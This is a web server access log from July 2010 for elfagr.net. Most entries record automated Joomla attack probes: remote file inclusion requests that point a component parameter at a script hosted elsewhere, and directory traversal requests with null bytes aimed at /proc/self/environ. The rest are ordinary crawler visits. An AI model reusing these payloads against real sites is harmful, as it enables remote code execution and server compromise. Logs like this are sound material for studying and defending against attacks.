216.86.146.14 - - [02/Jul/2010:15:17:51 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:17:41 -0700] "GET /logs/access.log%20%20//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:15:24:11 -0700] "GET /logs/access.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:15:24:21 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:15:24:11 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:15:24:26 -0700] "GET /logs/scripts.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:15:26:59 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:15:27:10 -0700] "GET /logs/access.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:15:27:10 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:15:27:17 -0700] "GET /logs/scripts.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
95.133.183.9 - - [02/Jul/2010:15:27:41 -0700] "GET /logs/access_091022.log HTTP/1.0" 404 - "http://www.elfagr.net/logs/access_091022.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:27:54 -0700] "GET /logs/scripts.log//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:27:43 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:27:43 -0700] "GET /index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:28:20 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:28:10 -0700] "GET /logs/access.log%20%20//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:28:20 -0700] "GET /index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.0" 404 - "-" "rk q kangen" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:15:29:37 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:15:29:27 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:15:29:27 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:15:33:52 -0700] "GET /logs/access.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:15:33:41 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:15:33:41 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:36:31 -0700] "GET /index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:36:21 -0700] "GET /logs/scripts.log//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:36:21 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:15:36:30 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:15:36:41 -0700] "GET /logs/access.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:15:36:30 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
189.71.81.118 - - [02/Jul/2010:15:38:01 -0700] "GET /logs/ HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6" "www.elfagr.net"
189.71.81.118 - - [02/Jul/2010:15:38:12 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6" "www.elfagr.net"
189.71.81.118 - - [02/Jul/2010:15:38:04 -0700] "GET /logs/access.log HTTP/1.1" 200 355240 "http://www.elfagr.net/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6" "www.elfagr.net"
189.71.81.118 - - [02/Jul/2010:15:38:04 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6" "www.elfagr.net"
93.158.149.32 - - [02/Jul/2010:15:46:11 -0700] "GET /logs/access_100318.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:46:30 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:46:40 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:46:30 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:52:29 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:52:29 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:52:40 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:57:46 -0700] "GET /logs/access.log//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:57:46 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:57:46 -0700] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4804 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:58:04 -0700] "GET /logs/scripts.log//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:16:03:46 -0700] "GET /logs/access.log//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:16:03:46 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:16:03:46 -0700] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4804 "-" "rk q kangen" "www.elfagr.net"
67.195.111.171 - - [02/Jul/2010:16:11:07 -0700] "GET /index_files/image330.wmz HTTP/1.0" 200 197 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
64.34.178.107 - - [02/Jul/2010:16:12:38 -0700] "GET /logs/index.php?option=com_simpleboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
64.34.178.107 - - [02/Jul/2010:16:12:39 -0700] "GET /logs/index.php?option=com_simpleboard&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
64.34.178.107 - - [02/Jul/2010:16:12:49 -0700] "GET /index.php?option=com_simpleboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
64.34.178.107 - - [02/Jul/2010:16:12:49 -0700] "GET /index.php?option=com_simpleboard&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
64.34.178.107 - - [02/Jul/2010:16:12:40 -0700] "GET /logs/index.php?option=com_simpleboard&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
64.34.178.107 - - [02/Jul/2010:16:12:40 -0700] "GET /index.php?option=com_simpleboard&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
64.34.178.107 - - [02/Jul/2010:16:12:40 -0700] "GET /logs/index.php?option=com_simpleboard&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
64.34.178.107 - - [02/Jul/2010:16:12:50 -0700] "GET /index.php?option=com_simpleboard&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:16:23 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:16:23 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:16:23 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:16:49 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:16:20:17 -0700] "GET /logs/access_081211.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:16:20:20 -0700] "GET /logs/access_081218.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:16:20:24 -0700] "GET /logs/access_081225.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:16:20:26 -0700] "GET /logs/access_090101.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:25:12 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:25:12 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:25:12 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:25:40 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:25:40 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:25:30 -0700] "GET /logs/access.log%20%20/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:29:55 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:29:55 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:29:55 -0700] "GET /logs/access.log%20%20/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
88.250.57.232 - - [02/Jul/2010:16:33:28 -0700] "GET /logs/access_100701.log HTTP/1.0" 200 1961129 "-" "Wget/1.11.4" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:35:45 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:35:45 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:35:34 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:35:50 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:38:22 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:38:22 -0700] "GET /logs/access.log%20%20/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:38:22 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
93.158.149.32 - - [02/Jul/2010:16:39:48 -0700] "GET /logs/access_100422.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:43:43 -0700] "GET /logs/scripts.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:43:43 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:43:43 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
67.195.111.171 - - [02/Jul/2010:16:45:17 -0700] "GET /tmp/?S=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:46:40 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:46:40 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:46:40 -0700] "GET /logs/access.log%20%20/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:49:04 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:49:14 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:49:04 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:16:51:19 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:16:51:19 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:16:51:30 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:16:51:35 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:51:45 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:51:55 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:51:55 -0700] "GET /logs/scripts.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:53:15 -0700] "GET /logs/scripts.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:53:26 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:16:53:15 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:16:56:01 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:16:56:02 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:16:56:02 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:00:06 -0700] "GET /logs/access.log%20%20//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:00:06 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:00:06 -0700] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4804 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:17:03:58 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:17:03:58 -0700] "GET /logs/scripts.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:17:03:58 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:13:48 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:13:48 -0700] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4804 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:13:48 -0700] "GET /logs/access.log%20%20//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:14:09 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:14:20 -0700] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4804 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:14:09 -0700] "GET /logs/scripts.log//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:26:17 -0700] "GET /logs/scripts.log//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:26:17 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:17:26:28 -0700] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4804 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:17:29:29 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:17:29:40 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:17:29:29 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:17:30:53 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:17:30:57 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
